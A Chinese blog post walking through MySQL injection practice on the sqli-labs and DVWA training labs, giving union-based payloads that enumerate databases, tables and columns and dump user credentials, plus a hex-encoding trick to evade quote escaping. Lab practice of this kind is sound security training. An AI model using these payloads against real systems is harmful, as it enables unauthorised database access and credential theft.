首页
所有分类
TAGS
文字工具 EMOJI BIBLE
数据库 MySQL

MySQL注入基础练习

Posted in MySQL onMay 30, 2021

以sqli-labs-master作为练习

初始:简单获取基础内容

第一步,使用拼接的方式决定注入类型

MySQL注入基础练习

第二部,使用order by确定有表单有几列值

order by根据指定的列对结果集进行排序

MySQL注入基础练习

第三步,使用union select 来找到内容,获取想要得到内容

union select :联合查询

MySQL注入基础练习

进阶,通过mysql注入获取表单内容,托库;

第一步:通过数据库语句进行搜索,首先确定数据库

MySQL注入基础练习

第二部:确定数据库后,爆出它的表;

MySQL注入基础练习

第三步:确定表以后,可根据实际需求爆表,这里以users举例,进行爆字段

MySQL注入基础练习

第四部:确定字段后,我们就可以拖库;

MySQL注入基础练习

DVWA训练基础 low级别

1.参照上文确定当前库

1' union select (select database()),2 -- -

MySQL注入基础练习

2.确定库后,爆表

1' union select (select group_concat(table_name) from information_schema.tables where table_schema = 'dvwa'),2 -- -

MySQL注入基础练习

3.确定表后,爆字段

1' union select (select group_concat(column_name) from information_schema.columns where table_schema = 'dvwa' and table_name='users'),2 -- -

MySQL注入基础练习

4.确定字段后,进行拖库

1' union select (select group_concat(concat_ws(0x7e,user,password))from users),2 -- -

MySQL注入基础练习

级别Medium

与low级别不同,没有输入框,只有选择项,所以需要借助bp工具

MySQL注入基础练习

1.打开代理使用bp进行抓包并发送到Repeater模块进行反复验证

MySQL注入基础练习

2.其余步骤参考上文:暴库

MySQL注入基础练习

爆表

ps:因为后台强制转译的问题,要注意避免单引号

MySQL注入基础练习

爆字段

同爆表,因为转译的问题,要注意避免引号,可使用编译规避;

1 union  select 1,(select group_concat(column_name) from information_schema.columns where table_schema = (select database()) and table_name=0x7573657273)

MySQL注入基础练习

拖库

MySQL注入基础练习

MySQL注入基础练习

- Author -

纪迁辰

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

MySQL 相关文章推荐
mysql的MVCC多版本并发控制的实现
Apr 14 MySQL
MySQL数据迁移相关总结
Apr 29 MySQL
MySQL 数据丢失排查案例
May 08 MySQL
Mysql 用户权限管理实现
May 25 MySQL
MySQL 百万级数据的4种查询优化方式
Jun 07 MySQL
Mysql关于数据库是否应该使用外键约束详解说明
Oct 24 MySQL
mysql主从复制的实现步骤
Oct 24 MySQL
Mysql 数据库中的 redo log 和 binlog 写入策略
Apr 26 MySQL
mysql如何查询连续记录
May 11 MySQL
MySQL的prepare使用以及遇到的bug
May 11 MySQL
MySQL 数据库 增删查改、克隆、外键 等操作
May 11 MySQL
Mysql中@和@@符号的详细使用指南
Jun 05 MySQL
解决Navicat for MySQL 连接 MySQL 报2005错误的问题
MYSQL(电话号码,身份证)数据脱敏的实现
May 28 #MySQL
MySql开发之自动同步表结构
mysql升级到5.7时,wordpress导数据报错1067的问题
May 27 #MySQL
解决Navicat for Mysql连接报错1251的问题(连接失败)
Navicat for MySQL的使用教程详解
MySQL Router实现MySQL的读写分离的方法
百度地图(1) 封装(1) XDM(3) gRPC(3) 构造函数(1) 继承(1) variables(1) 验证表达式(1) PyAutoGUI(1) promise(2)
You might like
phpinfo 系统查看参数函数代码
2009/06/05 PHP
php smarty模版引擎中的缓存应用
2009/12/02 PHP
基于PHP常用字符串的总结(待续)
2013/06/07 PHP
PHP设计模式之解释器模式的深入解析
2013/06/13 PHP
php中替换字符串函数strtr()和str_repalce()的用法与区别
2016/11/25 PHP
php读取XML的常见方法实例总结
2017/04/25 PHP
JavaScript网页定位详解
2014/01/13 Javascript
jQuery实现表格颜色交替显示的方法
2015/03/09 Javascript
Node.js编程中客户端Session的使用详解
2015/06/23 Javascript
微信小程序 五星评分(包括半颗星评分)实例代码
2016/12/14 Javascript
Vue.js基础指令实例讲解(各种数据绑定、表单渲染大总结)
2017/07/03 Javascript
element中的$confirm的使用
2020/04/26 Javascript
vuex 多模块时 模块内部的mutation和action的调用方式
2020/07/24 Javascript
ant-design表单处理和常用方法及自定义验证操作
2020/10/27 Javascript
vue使用echarts图表自适应的几种解决方案
2020/12/04 Vue.js
python3.3教程之模拟百度登陆代码分享
2014/01/16 Python
python读取yaml文件后修改写入本地实例
2020/04/27 Python
升级keras解决load_weights()中的未定义skip_mismatch关键字问题
2020/06/12 Python
详解Pycharm安装及Django安装配置指南
2020/09/15 Python
Booking.com美国:全球酒店预订网站
2017/04/18 全球购物
ROSEFIELD手表荷兰官方网上商店:北欧极简设计女士腕表品牌
2018/01/24 全球购物
蹦床仓库:Trampoline Warehouse
2018/12/06 全球购物
世界各地的旅游、观光和活动:Isango!
2019/10/29 全球购物
用C#语言写出与SQLSERVER访问时的具体过程
2013/04/16 面试题
幼儿师范毕业生自荐信
2013/11/09 职场文书
员工三分钟演讲稿
2014/08/19 职场文书
高中学生自我评价范文
2014/09/23 职场文书
工作失职检讨书(精华篇)
2014/10/15 职场文书
2015年元旦主持词开场白
2014/12/14 职场文书
2015年精神文明建设工作总结
2015/04/21 职场文书
行政介绍信范文
2015/05/04 职场文书
签证工作证明模板
2015/06/15 职场文书
2016年校园社会综合治理宣传月活动总结
2016/03/16 职场文书
导游词之山东八仙过海景区
2019/11/11 职场文书
python数据分析之用sklearn预测糖尿病
2021/04/22 Python
sql通过日期判断年龄函数的示例代码
2021/07/16 SQL Server